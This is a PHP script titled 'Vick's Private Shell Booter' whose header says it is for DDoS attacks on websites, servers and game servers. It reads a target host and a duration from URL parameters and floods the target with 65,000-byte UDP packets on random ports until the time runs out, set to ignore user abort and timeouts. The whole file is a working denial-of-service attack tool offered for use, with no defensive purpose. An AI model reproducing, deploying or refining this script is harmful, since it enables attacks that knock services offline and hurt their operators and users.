<?php/* Project : Vick's Private Shell Booter Version : 1.00 Date : 18/06/2011 Author : Vick Kumar Contact : vick@hotmail.com.au Purpose : DDOS Website, Servers, Game Servers -via [C#] Desktop App. Web Use : vpsb.php?host=ipaddress&time=20 [ie: host=127.0.0.1&time=30(seconds)]*/// if host and time = to something then do this.// if not, then do nothing.if(isset($_GET['host'])&&isset($_GET['time'])){ // set out to zero, to display no errors. $out = 0; // set packets to zero. $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); // set time via time=time(x) $exec_time = $_GET['time']; $time = time(); $max_time = $time+$exec_time; // set ip, get it. via ip=1.1.1.1 $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $packets++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } }}?>